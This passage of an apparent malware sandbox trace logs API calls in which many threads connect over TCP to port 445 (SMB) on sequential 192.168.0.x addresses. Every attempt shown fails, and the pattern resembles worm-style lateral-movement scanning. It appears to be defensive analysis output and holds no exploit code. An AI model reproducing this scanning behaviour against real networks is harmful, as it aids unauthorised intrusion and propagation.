GetCurrentThreadId () returned 0x114 [0165.150] longjmp () [0165.150] GetCurrentThreadId () returned 0x114 [0165.150] CloseHandle (hObject=0x132c) returned 1 [0165.150] GetCurrentThreadId () returned 0x114 [0165.150] Sleep (dwMilliseconds=0x0) [0165.204] _endthreadex (_ReturnCode=0x0) Thread: id = 1013 os_tid = 0xc34 [0143.939] GetCurrentThreadId () returned 0xc34 [0143.939] GetCurrentThreadId () returned 0xc34 [0143.939] GetCurrentThreadId () returned 0xc34 [0143.939] _errno () returned 0x297aa30 [0143.939] wcslen (_String="192.168.0.218") returned 0xd [0143.939] wcstombs (in: _Dest=0x1d41d158, _Source="192.168.0.218", _MaxCount=0xe | out: _Dest="192.168.0.218") returned 0xd [0143.939] htons (hostshort=0x1bd) returned 0xbd01 [0143.939] inet_addr (cp="192.168.0.218") returned 0xda00a8c0 [0143.939] socket (af=2, type=1, protocol=0) returned 0x1350 [0143.940] connect (s=0x1350, name=0x2173fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.218"), namelen=16) returned -1 [0165.151] GetCurrentThreadId () returned 0xc34 [0165.151] GetCurrentThreadId () returned 0xc34 [0165.151] longjmp () [0165.151] GetCurrentThreadId () returned 0xc34 [0165.151] CloseHandle (hObject=0x1340) returned 1 [0165.151] GetCurrentThreadId () returned 0xc34 [0165.151] Sleep (dwMilliseconds=0x0) [0165.204] _endthreadex (_ReturnCode=0x0) Thread: id = 1014 os_tid = 0xccc [0143.944] GetCurrentThreadId () returned 0xccc [0143.944] GetCurrentThreadId () returned 0xccc [0143.944] GetCurrentThreadId () returned 0xccc [0143.944] _errno () returned 0x297a808 [0143.944] wcslen (_String="192.168.0.219") returned 0xd [0143.944] wcstombs (in: _Dest=0x1d41e160, _Source="192.168.0.219", _MaxCount=0xe | out: _Dest="192.168.0.219") returned 0xd [0143.944] htons (hostshort=0x1bd) returned 0xbd01 [0143.944] inet_addr (cp="192.168.0.219") returned 0xdb00a8c0 [0143.944] socket (af=2, type=1, protocol=0) returned 0x1364 [0143.944] connect (s=0x1364, name=0x2197fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.219"), namelen=16) returned -1 [0165.151] GetCurrentThreadId () returned 0xccc [0165.151] GetCurrentThreadId () returned 0xccc [0165.151] longjmp () [0165.151] GetCurrentThreadId () returned 0xccc [0165.151] CloseHandle (hObject=0x1354) returned 1 [0165.151] GetCurrentThreadId () returned 0xccc [0165.151] Sleep (dwMilliseconds=0x0) [0165.205] _endthreadex (_ReturnCode=0x0) Thread: id = 1015 os_tid = 0xcb8 [0143.945] GetCurrentThreadId () returned 0xcb8 [0143.945] GetCurrentThreadId () returned 0xcb8 [0143.945] GetCurrentThreadId () returned 0xcb8 [0143.945] _errno () returned 0x2976ff8 [0143.948] wcslen (_String="192.168.0.220") returned 0xd [0143.948] wcstombs (in: _Dest=0x1d428fc8, _Source="192.168.0.220", _MaxCount=0xe | out: _Dest="192.168.0.220") returned 0xd [0143.948] htons (hostshort=0x1bd) returned 0xbd01 [0143.948] inet_addr (cp="192.168.0.220") returned 0xdc00a8c0 [0143.948] socket (af=2, type=1, protocol=0) returned 0x1378 [0143.949] connect (s=0x1378, name=0x21bbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.220"), namelen=16) returned -1 [0165.151] GetCurrentThreadId () returned 0xcb8 [0165.151] GetCurrentThreadId () returned 0xcb8 [0165.151] longjmp () [0165.151] GetCurrentThreadId () returned 0xcb8 [0165.151] CloseHandle (hObject=0x1368) returned 1 [0165.151] GetCurrentThreadId () returned 0xcb8 [0165.151] Sleep (dwMilliseconds=0x0) [0165.205] _endthreadex (_ReturnCode=0x0) Thread: id = 1016 os_tid = 0xc6c [0143.950] GetCurrentThreadId () returned 0xc6c [0143.950] GetCurrentThreadId () returned 0xc6c [0143.950] GetCurrentThreadId () returned 0xc6c [0143.950] _errno () returned 0x2977220 [0143.950] wcslen (_String="192.168.0.221") returned 0xd [0143.950] wcstombs (in: _Dest=0x1d426fb8, _Source="192.168.0.221", _MaxCount=0xe | out: _Dest="192.168.0.221") returned 0xd [0143.950] htons (hostshort=0x1bd) returned 0xbd01 [0143.950] inet_addr (cp="192.168.0.221") returned 0xdd00a8c0 [0143.950] socket (af=2, type=1, protocol=0) returned 0x138c [0143.950] connect (s=0x138c, name=0x21dffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.221"), namelen=16) returned -1 [0165.151] GetCurrentThreadId () returned 0xc6c [0165.151] GetCurrentThreadId () returned 0xc6c [0165.151] longjmp () [0165.151] GetCurrentThreadId () returned 0xc6c [0165.151] CloseHandle (hObject=0x137c) returned 1 [0165.151] GetCurrentThreadId () returned 0xc6c [0165.151] Sleep (dwMilliseconds=0x0) [0165.206] _endthreadex (_ReturnCode=0x0) Thread: id = 1017 os_tid = 0xd24 [0143.951] GetCurrentThreadId () returned 0xd24 [0143.951] GetCurrentThreadId () returned 0xd24 [0143.951] GetCurrentThreadId () returned 0xd24 [0143.951] _errno () returned 0x297ac58 [0143.952] wcslen (_String="192.168.0.222") returned 0xd [0143.952] wcstombs (in: _Dest=0x1d421f90, _Source="192.168.0.222", _MaxCount=0xe | out: _Dest="192.168.0.222") returned 0xd [0143.952] htons (hostshort=0x1bd) returned 0xbd01 [0143.952] inet_addr (cp="192.168.0.222") returned 0xde00a8c0 [0143.952] socket (af=2, type=1, protocol=0) returned 0x13a0 [0143.952] connect (s=0x13a0, name=0x2203fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.222"), namelen=16) returned -1 [0165.152] GetCurrentThreadId () returned 0xd24 [0165.152] GetCurrentThreadId () returned 0xd24 [0165.152] longjmp () [0165.152] GetCurrentThreadId () returned 0xd24 [0165.152] CloseHandle (hObject=0x1390) returned 1 [0165.152] GetCurrentThreadId () returned 0xd24 [0165.152] Sleep (dwMilliseconds=0x0) [0165.207] _endthreadex (_ReturnCode=0x0) Thread: id = 1018 os_tid = 0xc7c [0143.953] GetCurrentThreadId () returned 0xc7c [0143.953] GetCurrentThreadId () returned 0xc7c [0143.953] GetCurrentThreadId () returned 0xc7c [0143.953] _errno () returned 0x2977670 [0143.953] wcslen (_String="192.168.0.223") returned 0xd [0143.953] wcstombs (in: _Dest=0x1d427fc0, _Source="192.168.0.223", _MaxCount=0xe | out: _Dest="192.168.0.223") returned 0xd [0143.953] htons (hostshort=0x1bd) returned 0xbd01 [0143.953] inet_addr (cp="192.168.0.223") returned 0xdf00a8c0 [0143.953] socket (af=2, type=1, protocol=0) returned 0x13b4 [0143.953] connect (s=0x13b4, name=0x2227fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.223"), namelen=16) returned -1 [0165.152] GetCurrentThreadId () returned 0xc7c [0165.152] GetCurrentThreadId () returned 0xc7c [0165.152] longjmp () [0165.152] GetCurrentThreadId () returned 0xc7c [0165.152] CloseHandle (hObject=0x13a4) returned 1 [0165.152] GetCurrentThreadId () returned 0xc7c [0165.152] Sleep (dwMilliseconds=0x0) [0165.207] _endthreadex (_ReturnCode=0x0) Thread: id = 1019 os_tid = 0xc74 [0143.954] GetCurrentThreadId () returned 0xc74 [0143.954] GetCurrentThreadId () returned 0xc74 [0143.954] GetCurrentThreadId () returned 0xc74 [0143.954] _errno () returned 0x2977898 [0143.954] wcslen (_String="192.168.0.224") returned 0xd [0143.954] wcstombs (in: _Dest=0x1d429fd0, _Source="192.168.0.224", _MaxCount=0xe | out: _Dest="192.168.0.224") returned 0xd [0143.954] htons (hostshort=0x1bd) returned 0xbd01 [0143.954] inet_addr (cp="192.168.0.224") returned 0xe000a8c0 [0143.954] socket (af=2, type=1, protocol=0) returned 0x13c8 [0143.956] connect (s=0x13c8, name=0x224bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.224"), namelen=16) returned -1 [0165.152] GetCurrentThreadId () returned 0xc74 [0165.152] GetCurrentThreadId () returned 0xc74 [0165.152] longjmp () [0165.152] GetCurrentThreadId () returned 0xc74 [0165.152] CloseHandle (hObject=0x13b8) returned 1 [0165.152] GetCurrentThreadId () returned 0xc74 [0165.152] Sleep (dwMilliseconds=0x0) [0165.208] _endthreadex (_ReturnCode=0x0) Thread: id = 1020 os_tid = 0xd40 [0143.957] GetCurrentThreadId () returned 0xd40 [0143.957] GetCurrentThreadId () returned 0xd40 [0143.957] GetCurrentThreadId () returned 0xd40 [0143.957] _errno () returned 0x2977ac0 [0143.957] wcslen (_String="192.168.0.225") returned 0xd [0143.957] wcstombs (in: _Dest=0x1d422f98, _Source="192.168.0.225", _MaxCount=0xe | out: _Dest="192.168.0.225") returned 0xd [0143.957] htons (hostshort=0x1bd) returned 0xbd01 [0143.957] inet_addr (cp="192.168.0.225") returned 0xe100a8c0 [0143.957] socket (af=2, type=1, protocol=0) returned 0x13dc [0143.957] connect (s=0x13dc, name=0x226ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.225"), namelen=16) returned -1 [0165.152] GetCurrentThreadId () returned 0xd40 [0165.152] GetCurrentThreadId () returned 0xd40 [0165.152] longjmp () [0165.152] GetCurrentThreadId () returned 0xd40 [0165.152] CloseHandle (hObject=0x13cc) returned 1 [0165.152] GetCurrentThreadId () returned 0xd40 [0165.152] Sleep (dwMilliseconds=0x0) [0165.209] _endthreadex (_ReturnCode=0x0) Thread: id = 1021 os_tid = 0xd3c [0143.958] GetCurrentThreadId () returned 0xd3c [0143.959] GetCurrentThreadId () returned 0xd3c [0143.959] GetCurrentThreadId () returned 0xd3c [0143.959] _errno () returned 0x2977ce8 [0143.959] wcslen (_String="192.168.0.226") returned 0xd [0143.959] wcstombs (in: _Dest=0x1d42afd8, _Source="192.168.0.226", _MaxCount=0xe | out: _Dest="192.168.0.226") returned 0xd [0143.959] htons (hostshort=0x1bd) returned 0xbd01 [0143.959] inet_addr (cp="192.168.0.226") returned 0xe200a8c0 [0143.959] socket (af=2, type=1, protocol=0) returned 0x13f0 [0143.960] connect (s=0x13f0, name=0x2293fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.226"), namelen=16) returned -1 [0165.153] GetCurrentThreadId () returned 0xd3c [0165.153] GetCurrentThreadId () returned 0xd3c [0165.153] longjmp () [0165.153] GetCurrentThreadId () returned 0xd3c [0165.153] CloseHandle (hObject=0x13e0) returned 1 [0165.153] GetCurrentThreadId () returned 0xd3c [0165.153] Sleep (dwMilliseconds=0x0) [0165.209] _endthreadex (_ReturnCode=0x0) Thread: id = 1022 os_tid = 0x714 [0143.961] GetCurrentThreadId () returned 0x714 [0143.961] GetCurrentThreadId () returned 0x714 [0143.961] GetCurrentThreadId () returned 0x714 [0143.961] _errno () returned 0x2977f10 [0143.961] wcslen (_String="192.168.0.227") returned 0xd [0143.961] wcstombs (in: _Dest=0x1d424fa8, _Source="192.168.0.227", _MaxCount=0xe | out: _Dest="192.168.0.227") returned 0xd [0143.961] htons (hostshort=0x1bd) returned 0xbd01 [0143.961] inet_addr (cp="192.168.0.227") returned 0xe300a8c0 [0143.961] socket (af=2, type=1, protocol=0) returned 0x1408 [0143.961] connect (s=0x1408, name=0x22b7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.227"), namelen=16) returned -1 [0165.153] GetCurrentThreadId () returned 0x714 [0165.153] GetCurrentThreadId () returned 0x714 [0165.153] longjmp () [0165.153] GetCurrentThreadId () returned 0x714 [0165.153] CloseHandle (hObject=0x13f4) returned 1 [0165.153] GetCurrentThreadId () returned 0x714 [0165.153] Sleep (dwMilliseconds=0x0) [0165.210] _endthreadex (_ReturnCode=0x0) Thread: id = 1023 os_tid = 0xd78 [0143.963] GetCurrentThreadId () returned 0xd78 [0143.963] GetCurrentThreadId () returned 0xd78 [0143.963] GetCurrentThreadId () returned 0xd78 [0143.963] _errno () returned 0x2978138 [0143.963] wcslen (_String="192.168.0.228") returned 0xd [0143.963] wcstombs (in: _Dest=0x1d425fb0, _Source="192.168.0.228", _MaxCount=0xe | out: _Dest="192.168.0.228") returned 0xd [0143.963] htons (hostshort=0x1bd) returned 0xbd01 [0143.963] inet_addr (cp="192.168.0.228") returned 0xe400a8c0 [0143.963] socket (af=2, type=1, protocol=0) returned 0x141c [0143.963] connect (s=0x141c, name=0x22dbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.228"), namelen=16) returned -1 [0165.153] GetCurrentThreadId () returned 0xd78 [0165.153] GetCurrentThreadId () returned 0xd78 [0165.153] longjmp () [0165.153] GetCurrentThreadId () returned 0xd78 [0165.153] CloseHandle (hObject=0x140c) returned 1 [0165.153] GetCurrentThreadId () returned 0xd78 [0165.153] Sleep (dwMilliseconds=0x0) [0165.211] _endthreadex (_ReturnCode=0x0) Thread: id = 1024 os_tid = 0xd44 [0143.964] GetCurrentThreadId () returned 0xd44 [0143.964] GetCurrentThreadId () returned 0xd44 [0143.964] GetCurrentThreadId () returned 0xd44 [0143.964] _errno () returned 0x2977448 [0143.964] wcslen (_String="192.168.0.229") returned 0xd [0143.964] wcstombs (in: _Dest=0x1d423fa0, _Source="192.168.0.229", _MaxCount=0xe | out: _Dest="192.168.0.229") returned 0xd [0143.964] htons (hostshort=0x1bd) returned 0xbd01 [0143.964] inet_addr (cp="192.168.0.229") returned 0xe500a8c0 [0143.964] socket (af=2, type=1, protocol=0) returned 0x1430 [0143.964] connect (s=0x1430, name=0x22fffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.229"), namelen=16) returned -1 [0165.153] GetCurrentThreadId () returned 0xd44 [0165.153] GetCurrentThreadId () returned 0xd44 [0165.153] longjmp () [0165.153] GetCurrentThreadId () returned 0xd44 [0165.153] CloseHandle (hObject=0x1420) returned 1 [0165.153] GetCurrentThreadId () returned 0xd44 [0165.153] Sleep (dwMilliseconds=0x0) [0165.211] _endthreadex (_ReturnCode=0x0) Thread: id = 1025 os_tid = 0xd80 [0143.966] GetCurrentThreadId () returned 0xd80 [0143.966] GetCurrentThreadId () returned 0xd80 [0143.966] GetCurrentThreadId () returned 0xd80 [0143.966] _errno () returned 0x2972118 [0143.966] wcslen (_String="192.168.0.230") returned 0xd [0143.966] wcstombs (in: _Dest=0x1d42cfe8, _Source="192.168.0.230", _MaxCount=0xe | out: _Dest="192.168.0.230") returned 0xd [0143.966] htons (hostshort=0x1bd) returned 0xbd01 [0143.966] inet_addr (cp="192.168.0.230") returned 0xe600a8c0 [0143.966] socket (af=2, type=1, protocol=0) returned 0x1444 [0143.966] connect (s=0x1444, name=0x2323fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.230"), namelen=16) returned -1 [0165.153] GetCurrentThreadId () returned 0xd80 [0165.153] GetCurrentThreadId () returned 0xd80 [0165.154] longjmp () [0165.154] GetCurrentThreadId () returned 0xd80 [0165.154] CloseHandle (hObject=0x1434) returned 1 [0165.154] GetCurrentThreadId () returned 0xd80 [0165.154] Sleep (dwMilliseconds=0x0) [0165.213] _endthreadex (_ReturnCode=0x0) Thread: id = 1026 os_tid = 0x834 [0143.967] GetCurrentThreadId () returned 0x834 [0143.967] GetCurrentThreadId () returned 0x834 [0143.967] GetCurrentThreadId () returned 0x834 [0143.967] _errno () returned 0x297b8a0 [0143.967] wcslen (_String="192.168.0.231") returned 0xd [0143.967] wcstombs (in: _Dest=0x1d431008, _Source="192.168.0.231", _MaxCount=0xe | out: _Dest="192.168.0.231") returned 0xd [0143.967] htons (hostshort=0x1bd) returned 0xbd01 [0143.968] inet_addr (cp="192.168.0.231") returned 0xe700a8c0 [0143.968] socket (af=2, type=1, protocol=0) returned 0x1458 [0143.968] connect (s=0x1458, name=0x2347fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.231"), namelen=16) returned -1 [0165.154] GetCurrentThreadId () returned 0x834 [0165.154] GetCurrentThreadId () returned 0x834 [0165.154] longjmp () [0165.154] GetCurrentThreadId () returned 0x834 [0165.154] CloseHandle (hObject=0x1448) returned 1 [0165.154] GetCurrentThreadId () returned 0x834 [0165.154] Sleep (dwMilliseconds=0x0) [0165.213] _endthreadex (_ReturnCode=0x0) Thread: id = 1027 os_tid = 0xd14 [0143.969] GetCurrentThreadId () returned 0xd14 [0143.969] GetCurrentThreadId () returned 0xd14 [0143.969] GetCurrentThreadId () returned 0xd14 [0143.969] _errno () returned 0x297d4a8 [0143.969] wcslen (_String="192.168.0.232") returned 0xd [0143.969] wcstombs (in: _Dest=0x1d42dff0, _Source="192.168.0.232", _MaxCount=0xe | out: _Dest="192.168.0.232") returned 0xd [0143.969] htons (hostshort=0x1bd) returned 0xbd01 [0143.969] inet_addr (cp="192.168.0.232") returned 0xe800a8c0 [0143.969] socket (af=2, type=1, protocol=0) returned 0x146c [0143.969] connect (s=0x146c, name=0x236bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.232"), namelen=16) returned -1 [0165.154] GetCurrentThreadId () returned 0xd14 [0165.154] GetCurrentThreadId () returned 0xd14 [0165.154] longjmp () [0165.154] GetCurrentThreadId () returned 0xd14 [0165.154] CloseHandle (hObject=0x145c) returned 1 [0165.154] GetCurrentThreadId () returned 0xd14 [0165.154] Sleep (dwMilliseconds=0x0) [0165.214] _endthreadex (_ReturnCode=0x0) Thread: id = 1028 os_tid = 0x454 [0143.971] GetCurrentThreadId () returned 0x454 [0143.971] GetCurrentThreadId () returned 0x454 [0143.971] GetCurrentThreadId () returned 0x454 [0143.971] _errno () returned 0x297d6d0 [0143.971] wcslen (_String="192.168.0.233") returned 0xd [0143.971] wcstombs (in: _Dest=0x1d42eff8, _Source="192.168.0.233", _MaxCount=0xe | out: _Dest="192.168.0.233") returned 0xd [0143.971] htons (hostshort=0x1bd) returned 0xbd01 [0143.971] inet_addr (cp="192.168.0.233") returned 0xe900a8c0 [0143.971] socket (af=2, type=1, protocol=0) returned 0x1480 [0143.971] connect (s=0x1480, name=0x238ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.233"), namelen=16) returned -1 [0165.154] GetCurrentThreadId () returned 0x454 [0165.154] GetCurrentThreadId () returned 0x454 [0165.154] longjmp () [0165.154] GetCurrentThreadId () returned 0x454 [0165.154] CloseHandle (hObject=0x1470) returned 1 [0165.154] GetCurrentThreadId () returned 0x454 [0165.154] Sleep (dwMilliseconds=0x0) [0165.215] _endthreadex (_ReturnCode=0x0) Thread: id = 1029 os_tid = 0xcc8 [0143.972] GetCurrentThreadId () returned 0xcc8 [0143.972] GetCurrentThreadId () returned 0xcc8 [0143.972] GetCurrentThreadId () returned 0xcc8 [0143.972] _errno () returned 0x297d8f8 [0143.972] wcslen (_String="192.168.0.234") returned 0xd [0143.972] wcstombs (in: _Dest=0x1d430000, _Source="192.168.0.234", _MaxCount=0xe | out: _Dest="192.168.0.234") returned 0xd [0143.972] htons (hostshort=0x1bd) returned 0xbd01 [0143.972] inet_addr (cp="192.168.0.234") returned 0xea00a8c0 [0143.972] socket (af=2, type=1, protocol=0) returned 0x1494 [0143.973] connect (s=0x1494, name=0x23b3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.234"), namelen=16) returned -1 [0165.154] GetCurrentThreadId () returned 0xcc8 [0165.154] GetCurrentThreadId () returned 0xcc8 [0165.154] longjmp () [0165.154] GetCurrentThreadId () returned 0xcc8 [0165.154] CloseHandle (hObject=0x1484) returned 1 [0165.155] GetCurrentThreadId () returned 0xcc8 [0165.155] Sleep (dwMilliseconds=0x0) [0165.215] _endthreadex (_ReturnCode=0x0) Thread: id = 1030 os_tid = 0xd20 [0143.974] GetCurrentThreadId () returned 0xd20 [0143.974] GetCurrentThreadId () returned 0xd20 [0143.974] GetCurrentThreadId () returned 0xd20 [0143.974] _errno () returned 0x297db20 [0143.974] wcslen (_String="192.168.0.235") returned 0xd [0143.974] wcstombs (in: _Dest=0x1d432010, _Source="192.168.0.235", _MaxCount=0xe | out: _Dest="192.168.0.235") returned 0xd [0143.974] htons (hostshort=0x1bd) returned 0xbd01 [0143.974] inet_addr (cp="192.168.0.235") returned 0xeb00a8c0 [0143.974] socket (af=2, type=1, protocol=0) returned 0x14a8 [0143.974] connect (s=0x14a8, name=0x23d7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.235"), namelen=16) returned -1 [0165.155] GetCurrentThreadId () returned 0xd20 [0165.155] GetCurrentThreadId () returned 0xd20 [0165.155] longjmp () [0165.155] GetCurrentThreadId () returned 0xd20 [0165.155] CloseHandle (hObject=0x1498) returned 1 [0165.155] GetCurrentThreadId () returned 0xd20 [0165.155] Sleep (dwMilliseconds=0x0) [0165.216] _endthreadex (_ReturnCode=0x0) Thread: id = 1031 os_tid = 0xd70 [0143.975] GetCurrentThreadId () returned 0xd70 [0143.975] GetCurrentThreadId () returned 0xd70 [0143.975] GetCurrentThreadId () returned 0xd70 [0143.975] _errno () returned 0x297dd48 [0143.975] wcslen (_String="192.168.0.236") returned 0xd [0143.975] wcstombs (in: _Dest=0x1d433018, _Source="192.168.0.236", _MaxCount=0xe | out: _Dest="192.168.0.236") returned 0xd [0143.976] htons (hostshort=0x1bd) returned 0xbd01 [0143.976] inet_addr (cp="192.168.0.236") returned 0xec00a8c0 [0143.976] socket (af=2, type=1, protocol=0) returned 0x14bc [0143.976] connect (s=0x14bc, name=0x23fbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.236"), namelen=16) returned -1 [0165.155] GetCurrentThreadId () returned 0xd70 [0165.155] GetCurrentThreadId () returned 0xd70 [0165.155] longjmp () [0165.155] GetCurrentThreadId () returned 0xd70 [0165.155] CloseHandle (hObject=0x14ac) returned 1 [0165.155] GetCurrentThreadId () returned 0xd70 [0165.155] Sleep (dwMilliseconds=0x0) [0165.216] _endthreadex (_ReturnCode=0x0) Thread: id = 1032 os_tid = 0xd5c [0143.977] GetCurrentThreadId () returned 0xd5c [0143.977] GetCurrentThreadId () returned 0xd5c [0143.977] GetCurrentThreadId () returned 0xd5c [0143.977] _errno () returned 0x297df70 [0143.977] wcslen (_String="192.168.0.237") returned 0xd [0143.977] wcstombs (in: _Dest=0x1d42bfe0, _Source="192.168.0.237", _MaxCount=0xe | out: _Dest="192.168.0.237") returned 0xd [0143.977] htons (hostshort=0x1bd) returned 0xbd01 [0143.977] inet_addr (cp="192.168.0.237") returned 0xed00a8c0 [0143.977] socket (af=2, type=1, protocol=0) returned 0x14d0 [0143.977] connect (s=0x14d0, name=0x241ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.237"), namelen=16) returned -1 [0165.155] GetCurrentThreadId () returned 0xd5c [0165.155] GetCurrentThreadId () returned 0xd5c [0165.155] longjmp () [0165.155] GetCurrentThreadId () returned 0xd5c [0165.155] CloseHandle (hObject=0x14c0) returned 1 [0165.155] GetCurrentThreadId () returned 0xd5c [0165.155] Sleep (dwMilliseconds=0x0) [0165.217] _endthreadex (_ReturnCode=0x0) Thread: id = 1033 os_tid = 0xcac [0143.978] GetCurrentThreadId () returned 0xcac [0143.978] GetCurrentThreadId () returned 0xcac [0143.978] GetCurrentThreadId () returned 0xcac [0143.979] _errno () returned 0x297e198 [0143.979] wcslen (_String="192.168.0.238") returned 0xd [0143.979] wcstombs (in: _Dest=0x1d438040, _Source="192.168.0.238", _MaxCount=0xe | out: _Dest="192.168.0.238") returned 0xd [0143.979] htons (hostshort=0x1bd) returned 0xbd01 [0143.979] inet_addr (cp="192.168.0.238") returned 0xee00a8c0 [0143.979] socket (af=2, type=1, protocol=0) returned 0x14e4 [0143.979] connect (s=0x14e4, name=0x2443fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.238"), namelen=16) returned -1 [0165.155] GetCurrentThreadId () returned 0xcac [0165.155] GetCurrentThreadId () returned 0xcac [0165.155] longjmp () [0165.155] GetCurrentThreadId () returned 0xcac [0165.155] CloseHandle (hObject=0x14d4) returned 1 [0165.155] GetCurrentThreadId () returned 0xcac [0165.156] Sleep (dwMilliseconds=0x0) [0165.218] _endthreadex (_ReturnCode=0x0) Thread: id = 1034 os_tid = 0xcd0 [0143.980] GetCurrentThreadId () returned 0xcd0 [0143.980] GetCurrentThreadId () returned 0xcd0 [0143.980] GetCurrentThreadId () returned 0xcd0 [0143.980] _errno () returned 0x297e3c0 [0143.980] wcslen (_String="192.168.0.239") returned 0xd [0143.980] wcstombs (in: _Dest=0x1d439048, _Source="192.168.0.239", _MaxCount=0xe | out: _Dest="192.168.0.239") returned 0xd [0143.980] htons (hostshort=0x1bd) returned 0xbd01 [0143.980] inet_addr (cp="192.168.0.239") returned 0xef00a8c0 [0143.980] socket (af=2, type=1, protocol=0) returned 0x14f8 [0143.980] connect (s=0x14f8, name=0x2467fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.239"), namelen=16) returned -1 [0165.156] GetCurrentThreadId () returned 0xcd0 [0165.156] GetCurrentThreadId () returned 0xcd0 [0165.156] longjmp () [0165.156] GetCurrentThreadId () returned 0xcd0 [0165.156] CloseHandle (hObject=0x14e8) returned 1 [0165.156] GetCurrentThreadId () returned 0xcd0 [0165.156] Sleep (dwMilliseconds=0x0) [0165.218] _endthreadex (_ReturnCode=0x0) Thread: id = 1035 os_tid = 0x65c [0143.981] GetCurrentThreadId () returned 0x65c [0143.981] GetCurrentThreadId () returned 0x65c [0143.982] GetCurrentThreadId () returned 0x65c [0143.982] _errno () returned 0x297e5e8 [0143.982] wcslen (_String="192.168.0.240") returned 0xd [0143.982] wcstombs (in: _Dest=0x1d43a050, _Source="192.168.0.240", _MaxCount=0xe | out: _Dest="192.168.0.240") returned 0xd [0143.982] htons (hostshort=0x1bd) returned 0xbd01 [0143.982] inet_addr (cp="192.168.0.240") returned 0xf000a8c0 [0143.982] socket (af=2, type=1, protocol=0) returned 0x150c [0143.982] connect (s=0x150c, name=0x248bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.240"), namelen=16) returned -1 [0165.156] GetCurrentThreadId () returned 0x65c [0165.156] GetCurrentThreadId () returned 0x65c [0165.156] longjmp () [0165.156] GetCurrentThreadId () returned 0x65c [0165.156] CloseHandle (hObject=0x14fc) returned 1 [0165.156] GetCurrentThreadId () returned 0x65c [0165.156] Sleep (dwMilliseconds=0x0) [0165.219] _endthreadex (_ReturnCode=0x0) Thread: id = 1036 os_tid = 0x8f8 [0143.983] GetCurrentThreadId () returned 0x8f8 [0143.983] GetCurrentThreadId () returned 0x8f8 [0143.983] GetCurrentThreadId () returned 0x8f8 [0143.983] _errno () returned 0x297ea38 [0143.983] wcslen (_String="192.168.0.241") returned 0xd [0143.983] wcstombs (in: _Dest=0x1d43b058, _Source="192.168.0.241", _MaxCount=0xe | out: _Dest="192.168.0.241") returned 0xd [0143.983] htons (hostshort=0x1bd) returned 0xbd01 [0143.983] inet_addr (cp="192.168.0.241") returned 0xf100a8c0 [0143.983] socket (af=2, type=1, protocol=0) returned 0x1520 [0143.984] connect (s=0x1520, name=0x24bffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.241"), namelen=16) returned -1 [0165.156] GetCurrentThreadId () returned 0x8f8 [0165.156] GetCurrentThreadId () returned 0x8f8 [0165.156] longjmp () [0165.156] GetCurrentThreadId () returned 0x8f8 [0165.156] CloseHandle (hObject=0x1510) returned 1 [0165.156] GetCurrentThreadId () returned 0x8f8 [0165.156] Sleep (dwMilliseconds=0x0) [0165.219] _endthreadex (_ReturnCode=0x0) Thread: id = 1037 os_tid = 0xdac [0143.985] GetCurrentThreadId () returned 0xdac [0143.985] GetCurrentThreadId () returned 0xdac [0143.985] GetCurrentThreadId () returned 0xdac [0143.985] _errno () returned 0x297e810 [0143.985] wcslen (_String="192.168.0.242") returned 0xd [0143.985] wcstombs (in: _Dest=0x1d434020, _Source="192.168.0.242", _MaxCount=0xe | out: _Dest="192.168.0.242") returned 0xd [0143.985] htons (hostshort=0x1bd) returned 0xbd01 [0143.985] inet_addr (cp="192.168.0.242") returned 0xf200a8c0 [0143.985] socket (af=2, type=1, protocol=0) returned 0x1534 [0143.986] connect (s=0x1534, name=0x24e3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.242"), namelen=16) returned -1 [0165.156] GetCurrentThreadId () returned 0xdac [0165.156] GetCurrentThreadId () returned 0xdac [0165.156] longjmp () [0165.156] GetCurrentThreadId () returned 0xdac [0165.156] CloseHandle (hObject=0x1524) returned 1 [0165.156] GetCurrentThreadId () returned 0xdac [0165.156] Sleep (dwMilliseconds=0x0) [0165.220] _endthreadex (_ReturnCode=0x0) Thread: id = 1038 os_tid = 0x53c [0143.987] GetCurrentThreadId () returned 0x53c [0143.988] GetCurrentThreadId () returned 0x53c [0143.988] GetCurrentThreadId () returned 0x53c [0143.988] _errno () returned 0x297b000 [0143.988] wcslen (_String="192.168.0.243") returned 0xd [0143.988] wcstombs (in: _Dest=0x1d43c060, _Source="192.168.0.243", _MaxCount=0xe | out: _Dest="192.168.0.243") returned 0xd [0143.988] htons (hostshort=0x1bd) returned 0xbd01 [0143.988] inet_addr (cp="192.168.0.243") returned 0xf300a8c0 [0143.988] socket (af=2, type=1, protocol=0) returned 0x1548 [0143.988] connect (s=0x1548, name=0x2507fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.243"), namelen=16) returned -1 [0165.157] GetCurrentThreadId () returned 0x53c [0165.157] GetCurrentThreadId () returned 0x53c [0165.157] longjmp () [0165.157] GetCurrentThreadId () returned 0x53c [0165.157] CloseHandle (hObject=0x1538) returned 1 [0165.157] GetCurrentThreadId () returned 0x53c [0165.157] Sleep (dwMilliseconds=0x0) [0165.221] _endthreadex (_ReturnCode=0x0) Thread: id = 1039 os_tid = 0x5c0 [0143.989] GetCurrentThreadId () returned 0x5c0 [0143.989] GetCurrentThreadId () returned 